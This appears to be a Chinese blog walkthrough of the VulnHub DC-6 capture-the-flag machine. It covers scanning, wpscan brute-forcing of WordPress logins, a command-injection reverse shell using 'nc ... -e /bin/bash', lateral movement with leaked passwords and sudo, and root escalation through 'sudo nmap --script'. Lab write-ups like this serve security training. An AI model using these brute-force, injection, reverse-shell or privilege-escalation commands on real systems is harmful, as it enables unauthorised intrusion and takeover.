VulnHub-DC-6靶机-wpscan爆破+命令注入反弹shell+nmap提权
一、環境搭建
選擇掃描虛擬機
選擇靶機路徑
這里如果出現報錯,無法導入,如VMware出現配置文件 .vmx 是由VMware產品創建,但該產品與此版 VMware workstation 不兼容,因此無法使用(VMware版本不兼容問題),可以修改.vmx文件版本和虛擬機一致
二、信息收集
掃描ip
nmap -sn 192.168.108.142
掃描開放端口
得到以下信息
#PORT STATE 應用層協議
22/tcp open ssh
80/tcp open http
掃描服務信息
得到以下信息
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) #協議版本
80/tcp open http Apache httpd 2.4.25 ((Debian))
指紋探測
nmap 192.168.108.142 -p 22,80 -sV -sC -O --version-all
得到以下信息
運行系統:linux3.x|4.x
操作系統:linux 3.2-4.9
操作系統CPE:cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 #o-操作系統;linux-供應商;linux_kernel-產品;3-版本號
目錄掃描
先使用dirb
dirb http://192.168.108.142
暴露了很多目錄
dirbsearch掃描以下
dirsearch -u http://192.168.108.142 -e*
有很多目錄
總結一下目錄,這里只看訪問成功的目錄
http://192.168.108.142/index.php
http://192.168.108.142/server-status
http://192.168.108.142/license.txt
http://192.168.108.142/readme.html
http://192.168.108.142/wp-config.php
http://192.168.108.142/wp-content/
http://192.168.108.142/wp-includes/
http://192.168.108.142/wp-login.php
http://192.168.108.142/wp-cron.php
http://192.168.108.142/wp-admin/
http://192.168.108.142/wp-admin/install.php
http://192.168.108.142/wp-admin/admin.php
http://192.168.108.142/wp-admin/network/
http://192.168.108.142/wp-admin/user/
三、Web滲透
打開環境,無法正常訪問
設置域名解析
首先如果瀏覽器訪問過該網站,需要找到瀏覽器緩存,這里我使用的火狐瀏覽器,點擊管理數據
找到剛才的網站,刪除緩存
在下面的目錄下,選擇host屬性
C:\Windows\System32\drivers\etc
設置權限
設置之后在記事本編輯,設置如下,靶機ip 域名
然后刷新緩存即可
成功訪問
網站滲透
先看看網站指紋信息,使用了wordpress個管理系統,應該是有后臺的
查看上面掃描出來的目錄,找到一個登錄入口wp-login.php,但是沒有賬戶密碼,嘗試弱口令,發現存在admin用戶,但是不知道密碼,爆破無果
使用wpscan枚舉用戶信息,得到五個賬戶
wpscan --url http://wordy -e #枚舉賬戶信息
admin,mark,graham,sraah,jens
準備一個用戶列表
在該靶機官網發現以下信息,提示我們用此密碼表
cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt #那應該可以節省你幾年的時間
這個密碼字典使用前需要解壓
gzip -d /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt
拿到一個賬號密碼
wpscan --url http://wordy -U user.txt -P passwords.txt
Username: mark, Password: helpdesk01
后臺反彈shell
進入后臺后發現一個命令注入框,每次使用需要點擊lookup,先看看ip
測試幾個命令,發現可以執行
嘗試反彈shell,發現輸入框長度限制,修改一下
反彈shell
127.0.0.1|nc 192.168.108.142 4444 -e /bin/bash
反彈成功
四、提權
先找找有用信息
利用python獲取一個穩定shell
python -c "import pty;pty.spawn('/bin/bash')"
進入home目錄看看
發現幾個用戶文件,因為我們是mark登錄進來的,先看這個
有一個stuff文件,進去看看,發現一個賬號密碼
Add new user: graham - GSo7isUM1D4
進入graham看看有沒有什么信息
看看其他目錄,只有在jens目錄下發現一個backups.sh文件
ssh連接graham用戶
并沒有什么有用信息
sudo -l發現可以免密執行,此命令用于列出當前用戶在使用 sudo 執行命令時具有的權限和可運行的命令
寫入shell并利用jens賬戶執行
root權限nmap提權
看看此賬戶權限,有一個root的nmap命令可以使用,可以利用此來提權
寫一個腳本并用nmap命令執行
echo "os.execute('/bin/bash')" > shell.sh
sudo nmap --script=shell.sh
提權成功
總結
以上是生活随笔為你收集整理的VulnHub-DC-6靶机-wpscan爆破+命令注入反弹shell+nmap提权的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: docker环境搭建
- 下一篇: 数据挖掘 pandas基础入门之查看数据